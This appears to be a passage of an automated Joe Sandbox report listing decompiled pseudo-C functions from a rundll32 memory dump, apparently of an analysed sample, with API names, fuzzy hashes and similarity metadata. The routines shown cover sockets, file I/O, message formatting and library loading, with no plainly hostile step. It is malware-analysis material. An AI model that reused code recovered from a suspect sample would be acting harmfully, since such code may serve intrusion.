                				_t199 =  *((intOrPtr*)(_t232 + 0x30));
                				if (_t199 == 0) goto 0x205c8710;
                				 *((intOrPtr*)( *_t199 + 0x10))(_t245, _t242, _t240, _t220, _t223, _t228, _t187);
                				if (_t155 == 0) goto 0x205c8710;
                				 *((intOrPtr*)( *_t155))();
                				 *((char*)(_t225 + 0x58)) =  *((intOrPtr*)( *_t155 + 0x40))();
                				if ( *((intOrPtr*)(_t225 + 0x48)) != _t240) goto 0x205c8736;
                				r8d = 0;
                				E00000215215205C7C20( *(_t225 + 0x10) | 0x00000004,  *((intOrPtr*)(_t225 + 0x48)) - _t240, _t225);
                				 *((long long*)(_t232 + 0x88)) = _t229;
                				 *((long long*)( *((intOrPtr*)( *_t229 + 4)) + _t229)) = 0x206401d8;
                				 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4)) + _t229 - 4)) =  *((intOrPtr*)( *_t229 + 4)) - 0x10;
                				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0x20640120;
                				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x20;
                				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0x206401b0;
                				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x98;
                				 *((long long*)(_t232 + 0x88)) = _t221;
                				 *_t221 = 0x20640040;
                				E00000215215205F4DCC(0x20640040,  *((intOrPtr*)( *_t243 + 4)));
                				E00000215215205D6CC8(1, 0x20640040, _t225,  *_t155);
                				 *0x21520640048 = 0x20640040;
                				 *((long long*)(_t221 + 0x60)) = 0x20640040;
                				 *((long long*)(_t221 + 0x18)) = _t221 + 8;
                				_t209 = _t221 + 0x10;
                				 *((long long*)(_t221 + 0x20)) = _t209;
                				 *((long long*)(_t221 + 0x38)) = _t221 + 0x28;
                				 *((long long*)(_t221 + 0x40)) = _t221 + 0x30;
                				 *(_t221 + 0x50) = _t221 + 0x48;
                				 *(_t221 + 0x58) = _t221 + 0x4c;
                				 *_t209 = _t240;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) = _t240;
                				 *( *(_t221 + 0x58)) = r12d;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = _t240;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
                				 *( *(_t221 + 0x50)) = r12d;
                				 *_t221 = 0x20640130;
                				_t226 =  *((intOrPtr*)(_t246 + 0x10));
                				if ( *((long long*)(_t246 + 0x18)) - 0x10 < 0) goto 0x205c8841;
                				 *((long long*)(_t221 + 0x68)) = _t240;
                				 *(_t221 + 0x70) = r12d;
                				if (_t226 == 0) goto 0x205c88e1;
                				r8b = 1;
                				E0000021521520586110(_t226,  *_t199);
                				_t116 = E00000215215205F7310(1, __edi, __esi, _t137, 0x20640130,  *_t246, _t221, _t226, _t226);
                				_t237 = 0x20640130 + _t226;
                				 *((long long*)(_t221 + 0x68)) = _t237;
                				if (( *(_t221 + 0x70) & 0x00000004) != 0) goto 0x205c8895;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0x20640130;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = 0x20640130;
                				 *( *(_t221 + 0x50)) = __esi;
                				if (( *(_t221 + 0x70) & 0x00000002) != 0) goto 0x205c88dd;
                				_t219 =  !=  ? _t237 : 0x20640130;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x20)))) = 0x20640130;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) =  !=  ? _t237 : 0x20640130;
                				 *( *(_t221 + 0x58)) = _t117 - 1 + __esi;
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t221 + 0x38)))) != _t240) goto 0x205c88dd;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0x20640130;
                				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
                				 *( *(_t221 + 0x50)) = _t117;
                				 *(_t221 + 0x70) =  *(_t221 + 0x70) | 0x00000001;
                				return _t116;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_$ExceptionLocimpLocimp::_New_SetgloballocaleThrow
                • String ID:
                • API String ID: 2644447982-0
                • Opcode ID: 529956d84b6958c2e22c1e37415a335ac7025e49015a27c9e993c32f8a750d7f
                • Instruction ID: 53b2865265c98f21b224685aceda020d03b7e2aa072812a48cf9bbf1087745cc
                • Opcode Fuzzy Hash: 529956d84b6958c2e22c1e37415a335ac7025e49015a27c9e993c32f8a750d7f
                • Instruction Fuzzy Hash: 45A13533202F54D6DB24CF26E58869C77A8FB98B94B518626CF9E43B64DF39E465C300
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionCreateErrorLastPortSocketsetsockopt
                • String ID:
                • API String ID: 1324823626-0
                • Opcode ID: 4c445b2fc41ed5aa158aa1a4ef54fd076451617574ec4d2ce6ba46319e11291c
                • Instruction ID: fbee68c8635dbed3c2e3113a3d09e9de76b29aca5833e12c416cfa79f3cf0d3e
                • Opcode Fuzzy Hash: 4c445b2fc41ed5aa158aa1a4ef54fd076451617574ec4d2ce6ba46319e11291c
                • Instruction Fuzzy Hash: 6A819D33A11F64CAEB10CF71D9443AD37B0FBA97A8F005B45DEA916B89DB7485A4C780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E000002152152058F5A0(int __edx, void* __ebp, long long __rbx, char* __rcx, void* __rdx, void* __r8, void* _a16, void* _a24, long long _a32) {
                				long long _v48;
                				long long _v56;
                				char _v72;
                				long long _v80;
                				intOrPtr _v88;
                				long long _v96;
                				long long _v104;
                				intOrPtr _v112;
                				long long _v120;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				int _t60;
                				void* _t63;
                				int _t115;
                				void* _t123;
                				void* _t125;
                				long long _t126;
                				int _t129;
                				char* _t130;
                				short* _t132;
                				int _t134;
                				void* _t137;
                				intOrPtr _t142;
                				char _t144;
                				void* _t145;
                				int _t146;
                				long long _t149;
                
                				_t121 = __rdx;
                				_t145 = _t137;
                				 *((long long*)(_t145 + 8)) = __rcx;
                				_v80 = 0xfffffffe;
                				 *((long long*)(_t145 + 0x10)) = __rbx;
                				_t130 = __rcx;
                				r15d = 0;
                				_v88 = r15d;
                				_a24 = _t149;
                				 *((long long*)(_t145 - 0x68)) = _t149;
                				 *((intOrPtr*)(_t145 - 0x70)) = r15d;
                				 *((long long*)(_t145 - 0x78)) =  &_a24;
                				r9d = 0x400;
                				r8d = __edx;
                				if (FormatMessageW(??, ??, ??, ??, ??, ??, ??) != 0) goto 0x2058f612;
                				E000002152152058F510(__edx, FormatMessageW(??, ??, ??, ??, ??, ??, ??),  &_a24, __rbx, __rcx, __rdx, _t132, _t149);
                				_v88 = 1;
                				goto 0x2058f7aa;
                				_t108 = _a24;
                				_a32 = _a24;
                				_v96 = _t149;
                				_v104 = _t149;
                				_v112 = r15d;
                				_v120 = _t149;
                				r9d = r9d | 0xffffffff;
                				if (WideCharToMultiByte(_t146, _t129, _t132, _t134) != 0) goto 0x2058f65d;
                				E000002152152058F510(__edx, WideCharToMultiByte(_t146, _t129, _t132, _t134),  &_a24, _a24, _t130, _t121, _t132);
                				_v88 = 1;
                				goto 0x2058f7a1;
                				_v56 = _t149;
                				_v48 = _t149;
                				_v48 = 0xf;
                				_v56 = _t149;
                				_v72 = 0;
                				r8d = 0;
                				E000002152152059CDF0(_a24,  &_v72, _t57, _t132);
                				_t97 =  >=  ? _v72 :  &_v72;
                				_v96 = _t149;
                				_v104 = _t149;
                				_v112 = r14d;
                				_v120 =  >=  ? _v72 :  &_v72;
                				r9d = r9d | 0xffffffff;
                				_t142 = _a24;
                				_t60 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				r8d = _t60;
                				if (_t60 != 0) goto 0x2058f6cf;
                				E000002152152058F510(__edx, _t60,  >=  ? _v72 :  &_v72, _a24, _t130, _t57, _t132);
                				goto 0x2058f790;
                				r8d = r8d - 1;
                				_t115 = r8d;
                				_t144 = _v72;
                				if (r8d <= 0) goto 0x2058f744;
                				asm("o16 nop [eax+eax]");
                				_t99 =  >=  ? _t144 :  &_v72;
                				_t123 = _t115 - 1;
                				if ( *((char*)(_t123 + ( >=  ? _t144 :  &_v72))) == 0xa) goto 0x2058f719;
                				_t101 =  >=  ? _t144 :  &_v72;
                				if ( *((char*)(( >=  ? _t144 :  &_v72) + _t115 - 1)) != 0xd) goto 0x2058f724;
                				r8d = r8d - 1;
                				if (_t123 > 0) goto 0x2058f6f0;
                				if (r8d <= 0) goto 0x2058f744;
                				_t125 =  >=  ? _t144 :  &_v72;
                				_t42 = _t142 - 1; // -3
                				r8d =  ==  ? _t42 : r8d;
                				_t126 = r8d;
                				if (_t126 - _v56 > 0) goto 0x2058f766;
                				_v56 = _t126;
                				_t105 =  >=  ? _t144 :  &_v72;
                				 *((char*)(( >=  ? _t144 :  &_v72) + _t126)) = 0;
                				goto 0x2058f775;
                				r8d = 0;
                				E0000021521520586D70(_a24,  &_v72, _t126 - ( >=  ? _t144 :  &_v72), _t130, _t137);
                				 *((long long*)(_t130 + 0x18)) = 0xf;
                				 *((long long*)(_t130 + 0x10)) = _t149;
                				 *_t130 = 0;
                				_t63 = E0000021521520586E80(_t108, _t130,  &_v72);
                				_v88 = 1;
                				E0000021521520586820(_t63, _t42,  &_v72);
                				return LocalFree(??);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharFormatFreeLocalMessageMultiWide
                • String ID:
                • API String ID: 2906450291-0
                • Opcode ID: 7817812f2f4c45c696f8fc2488192bd5a3126306da22d2aa533c5870e1c94d58
                • Instruction ID: 46e30b579c64da81ba89882c409de297729b9b3b6b9db13049a50f6ffa6c9cd7
                • Opcode Fuzzy Hash: 7817812f2f4c45c696f8fc2488192bd5a3126306da22d2aa533c5870e1c94d58
                • Instruction Fuzzy Hash: D151CC33721BA0CAFB208F65E8487DD27F5FB98B88F504624DE5913B99EB38C4808710
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			E0000021521520591DF0(long long __rax, long long __rbx, long long __rcx, signed char* __rdx, long long __rsi, void* __r9, void* __r10, long long __r13, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
                				char _v64;
                				long long _v72;
                				long long _v80;
                				long long _v88;
                				intOrPtr _v104;
                				signed char _t40;
                				void* _t42;
                				void* _t55;
                				long long _t80;
                				long long _t81;
                				long long _t105;
                				long long _t106;
                				long long _t107;
                				long long _t119;
                				void* _t124;
                
                				_t105 = __rsi;
                				_t83 = __rbx;
                				_t80 = __rax;
                				r12d = 0;
                				_t124 = __r9;
                				if (__rcx == 0xffffffff) goto 0x20591fd9;
                				_a16 = __rbx;
                				if (r8b == 0) goto 0x20591e6e;
                				_t40 =  *__rdx & 0x000000ff;
                				if ((_t40 & 0x00000008) == 0) goto 0x20591e6e;
                				_a8 = r12d;
                				_v88 = __rcx;
                				_v80 = __rcx;
                				 *__rdx = _t40 | 0x00000008;
                				_v72 = _t119;
                				r8d = 0x80;
                				_v104 = 4;
                				__imp__#21();
                				_t42 = E0000021521520591CE0(0xff00 | (_t40 | 0x00000008) != 0x00000000, __rbx,  &_v88, __rdx, __rsi);
                				__imp__#3();
                				E0000021521520591CE0((0xff00 | (_t40 | 0x00000008) != 0x00000000) & 0xffffff00 | _t42 != 0x00000000, _t83, __r9, __rdx, _t105);
                				if (_t42 == 0) goto 0x20591fd5;
                				_a24 = _t105;
                				_a32 = __r13;
                				E000002152152058F380(__r9, __rdx);
                				_t106 = _t80;
                				_v88 = _t80;
                				_v80 = _t80;
                				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591ed8;
                				 *((intOrPtr*)( *_t106 + 0x30))();
                				goto 0x20591eda;
                				_t21 =  &_v64; // 0x4d54ee85da812018
                				_t81 = _t80 + 2;
                				_v88 = 0x2733;
                				_v72 = _t81;
                				_t93 = __r9;
                				asm("movsd xmm1, [ebp-0x20]");
                				_v80 = _t106;
                				asm("movups xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x8], xmm1");
                				asm("movups [ebp-0x18], xmm0");
                				if (E0000021521520590200(_t83, __r9, _t21) != 0) goto 0x20591f7c;
                				E000002152152058F380(_t93, _t21);
                				_t107 = _t81;
                				_v88 = _t81;
                				_v80 = _t81;
                				if ( *((intOrPtr*)(_t107 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591f42;
                				 *((intOrPtr*)( *_t107 + 0x30))();
                				goto 0x20591f44;
                				_t29 =  &_v64; // 0x4d54ee85da812018
                				_v88 = 0x4d5;
                				_v72 = _t81 + 2;
                				asm("movsd xmm1, [ebp-0x20]");
                				_v80 = _t107;
                				asm("movups xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x8], xmm1");
                				asm("movups [ebp-0x18], xmm0");
                				_t55 = E0000021521520590200(_t83, _t124, _t29);
                				if (_t55 == 0) goto 0x20591fae;
                				_a8 = r12d;
                				__imp__#10();
                				 *__rdx =  *__rdx & 0x000000fc;
                				__imp__#3();
                				E0000021521520591CE0(0x80046600 | _t55 != 0x00000000, _t83, _t124, _t29, _t107);
                				return _t55;
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: closesocket$ioctlsocketsetsockopt
                • String ID:
                • API String ID: 566113833-0
                • Opcode ID: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction ID: 05818bf60718d8ed1cfe4841d1066a0bb46d556f6e3514066d49de248f247fdf
                • Opcode Fuzzy Hash: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction Fuzzy Hash: 9051E133B11F748AEB50CF75A8843EE23B4BB99B88F004155EE8957B89DF3880958754
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0000021521520603B0C(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                				void* _v8;
                				char _v16;
                				intOrPtr* _v32;
                				char _v40;
                				void* __rdi;
                				void* _t17;
                				intOrPtr* _t43;
                				void* _t55;
                
                				_a8 = __rbx;
                				_a24 = __rsi;
                				_a32 = r9w;
                				_t55 = __rdx;
                				if (__rdx != 0) goto 0x20603b42;
                				if (__r8 == 0) goto 0x20603b42;
                				if (__rcx == 0) goto 0x20603b3b;
                				 *__rcx =  *__rcx & __edx;
                				goto 0x20603bd1;
                				if (__rcx == 0) goto 0x20603b4a;
                				 *__rcx =  *__rcx | 0xffffffff;
                				if (__r8 - 0x7fffffff <= 0) goto 0x20603b66;
                				_t17 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t17);
                				goto 0x20603bcf;
                				E00000215215205FA5D4(__rax, __rcx,  &_v40, _a40);
                				_t43 = _v32;
                				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0x20603c00;
                				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x20603be3;
                				if (_t55 == 0) goto 0x20603bb0;
                				if (__r8 == 0) goto 0x20603bb0;
                				E00000215215205F8EF0(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                				E0000021521520603944(_t43);
                				 *_t43 = 0x2a;
                				if (_v16 == 0) goto 0x20603bcf;
                				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                				return 0x2a;
                			}












                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 4141327611-0
                • Opcode ID: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction ID: a72b9a5096da18b86ce023cf783f4992ba7a6aba279cd1531858e2b2ec3b55b1
                • Opcode Fuzzy Hash: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction Fuzzy Hash: 7741B53324AA70C6FB759B1190883EAB69AFFF0B95F3841A09E5546ADDDB3CD8458700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000215215205B9A80(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
                				int _t34;
                				long _t35;
                				void* _t39;
                				long long _t73;
                				void* _t85;
                				void* _t86;
                
                				_a16 = __rbx;
                				_a32 = __rdi;
                				_a24 = __r8;
                				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0x205b9aaf;
                				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
                				goto 0x205b9ac1;
                				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0x205b9ac1;
                				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
                				asm("lock inc dword [eax+0x30]");
                				if ( *__rdx != 0xffffffff) goto 0x205b9af6;
                				r9d = 0;
                				r8d = 0x2719;
                				_pop(_t85);
                				goto E00000215215205B9130;
                				if ( *((long long*)(_t85 + 8)) != 0) goto 0x205b9b21;
                				r9d = 0;
                				r8d = 0;
                				_pop(_t86);
                				goto E00000215215205B9130;
                				_a120 = __rsi;
                				_t73 = _a152;
                				_a136 = 0;
                				_a88 = _t73;
                				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
                				r8d =  *(_t86 + 8);
                				_t34 = WriteFile(??, ??, ??, ??, ??);
                				_t35 = GetLastError();
                				if (_t34 != 0) goto 0x205b9b7f;
                				if (_t35 == 0x3e5) goto 0x205b9b7f;
                				if (_t35 == 0xea) goto 0x205b9b7f;
                				r9d = _a136;
                				r8d = _t35;
                				E00000215215205B9130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
                				goto 0x205b9b8b;
                				return E00000215215205B9090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
                			}










                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastWrite
                • String ID:
                • API String ID: 1327375210-0
                • Opcode ID: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction ID: 54ab56887dd87e8348d2fbd6e90ff179ce3cb538b258ec76d9d9b75567c774ce
                • Opcode Fuzzy Hash: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction Fuzzy Hash: EF315E37709EA0C6E720DB26E44875AB7A0FBA9BE4F144252DF5947B9CCB38E451CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000215215205B9BB0(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
                				int _t34;
                				long _t35;
                				void* _t39;
                				long long _t73;
                				void* _t85;
                				void* _t86;
                
                				_a16 = __rbx;
                				_a32 = __rdi;
                				_a24 = __r8;
                				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0x205b9bdf;
                				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
                				goto 0x205b9bf1;
                				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0x205b9bf1;
                				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
                				asm("lock inc dword [eax+0x30]");
                				if ( *__rdx != 0xffffffff) goto 0x205b9c26;
                				r9d = 0;
                				r8d = 0x2719;
                				_pop(_t85);
                				goto E00000215215205B9130;
                				if ( *((long long*)(_t85 + 8)) != 0) goto 0x205b9c51;
                				r9d = 0;
                				r8d = 0;
                				_pop(_t86);
                				goto E00000215215205B9130;
                				_a120 = __rsi;
                				_t73 = _a152;
                				_a136 = 0;
                				_a88 = _t73;
                				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
                				r8d =  *(_t86 + 8);
                				_t34 = ReadFile(??, ??, ??, ??, ??);
                				_t35 = GetLastError();
                				if (_t34 != 0) goto 0x205b9caf;
                				if (_t35 == 0x3e5) goto 0x205b9caf;
                				if (_t35 == 0xea) goto 0x205b9caf;
                				r9d = _a136;
                				r8d = _t35;
                				E00000215215205B9130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
                				goto 0x205b9cbb;
                				return E00000215215205B9090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
                			}










                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastRead
                • String ID:
                • API String ID: 895653707-0
                • Opcode ID: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction ID: f98ac8d3ed932f290e1fcc8ca88b2eab72ba2df2150af1d64797a7d2a95bf059
                • Opcode Fuzzy Hash: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction Fuzzy Hash: A3314F33719EA0C6E7209B26E44875AB7A0FB99BE4F144652DF5947B9CCB38E491CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215205C8328(void* __edi, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, char _a8, void* _a16, long long _a24) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* _t23;
                				signed long long _t43;
                				char _t44;
                				intOrPtr _t45;
                				intOrPtr* _t51;
                				signed long long _t66;
                				long long _t67;
                				void* _t68;
                
                				_t43 = __rax;
                				_v56 = 0xfffffffe;
                				_a24 = __rbx;
                				_t68 = __rcx;
                				E00000215215205D19DC(0,  &_a8);
                				_t67 =  *0x20683558; // 0x0
                				_a16 = _t67;
                				_t23 = E00000215215205B7490(_t43, 0x20681928);
                				_t66 = _t43;
                				_t44 = _a8;
                				if (_t66 -  *((intOrPtr*)(_t44 + 0x18)) >= 0) goto 0x205c837d;
                				goto 0x205c837f;
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t66 * 8)) != 0) goto 0x205c83fc;
                				if ( *((intOrPtr*)(_t44 + 0x24)) == 0) goto 0x205c83a0;
                				E00000215215205D6CC0(_t23);
                				if (_t66 -  *((intOrPtr*)(_t44 + 0x18)) >= 0) goto 0x205c839e;
                				_t45 =  *((intOrPtr*)(_t44 + 0x10));
                				goto 0x205c83a0;
                				if ( *((intOrPtr*)(_t45 + _t66 * 8)) != 0) goto 0x205c83fc;
                				if (_t67 == 0) goto 0x205c83af;
                				goto 0x205c83fc;
                				E00000215215205C7890(0, __edi, _t67,  &_a16, _t68, _t67);
                				if (_t45 != 0xffffffff) goto 0x205c83de;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t67,  &_v48, 0x2066bb90, _t67);
                				asm("int3");
                				_t51 = _a16;
                				 *0x20683558 = _t51;
                				 *((intOrPtr*)( *_t51 + 8))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t45, _t51),  &_a8);
                			}















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$ExceptionLockit::_Lockit::~_$Facet_FileGetctypeHeaderRaiseRegisterThrow
                • String ID:
                • API String ID: 1301905473-0
                • Opcode ID: 0a87115b2a4541f1ea178fbd2bee01074b8c547a6047a49ec11fec3f19984c84
                • Instruction ID: a52e471360dee20c24e06d637b43eb04383898dfc1263ef89b822a90c83fddc0
                • Opcode Fuzzy Hash: 0a87115b2a4541f1ea178fbd2bee01074b8c547a6047a49ec11fec3f19984c84
                • Instruction Fuzzy Hash: 8C216737307EA0D1EA109B15D8582E96760EBE4FB0F5916A1DE6D07BEDDB38D446C300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0000021521520586110(void* __rcx, void* __rdx) {
                
                				if (__rcx != 0) goto 0x20586123;
                				return 0;
                			}




                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d98254111e05adde69a3696cdcc994fb05bab6df1788f6c6edd5a136cdaeac6
                • Instruction ID: c8e8cf5c876b81901505cd98b29486cd11564bdadce3ee13924587c0762aad2d
                • Opcode Fuzzy Hash: 7d98254111e05adde69a3696cdcc994fb05bab6df1788f6c6edd5a136cdaeac6
                • Instruction Fuzzy Hash: F5F09032713E1291ED58F361945D3E921A01FE57B4F800BA0AF3E453DBEA7C80828700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ConditionMask$InfoVerifyVersion
                • String ID:
                • API String ID: 2793162063-0
                • Opcode ID: 6b76180261ab68b82ba0a6f9839fba1abc185b397e756bb63c8d0d5e7f904022
                • Instruction ID: 24695c5187d7d78245b93a750a80e1c06c93bd88aa576703b83141c1d278c9d0
                • Opcode Fuzzy Hash: 6b76180261ab68b82ba0a6f9839fba1abc185b397e756bb63c8d0d5e7f904022
                • Instruction Fuzzy Hash: 20112632606A90C6E634CF21F8597DAB3A1FBD8B55F005219AE8A47B58EB3CD245CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E00000215215205CB298(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
                				void* _v8;
                				signed int _v24;
                				char _v280;
                				void* __rdi;
                				struct HINSTANCE__* _t16;
                				void* _t19;
                				void* _t22;
                				void* _t23;
                				signed long long _t28;
                				signed long long _t29;
                				void* _t48;
                				void* _t53;
                				void* _t56;
                				void* _t57;
                				void* _t58;
                
                				_a24 = __rbx;
                				_a32 = __rsi;
                				_t28 =  *0x2067c720; // 0xca1645d940e
                				_t29 = _t28 ^ _t53 - 0x00000130;
                				_v24 = _t29;
                				r8d = 0x100;
                				E00000215215205F8EF0(_t19, 0, _t22, _t23,  &_v280, __rdx, _t48, _t56);
                				lstrcpyA(??, ??);
                				__imp__StrChrA();
                				if (_t29 != 0) goto 0x205cb2fe;
                				goto 0x205cb337;
                				 *_t29 = 0;
                				_t16 = LoadLibraryA(??);
                				if (_t29 == 0) goto 0x205cb2fa;
                				if ( *((char*)(_t29 + 1)) != 0x23) goto 0x205cb329;
                				__imp__StrToIntA();
                				 *__rdx = _t29;
                				E00000215215205CB35C(0x2e, __rdx, _t16, _t58);
                				return E00000215215205F59D0(_t19, _v24 ^ _t53 - 0x00000130, _t16, _t57);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
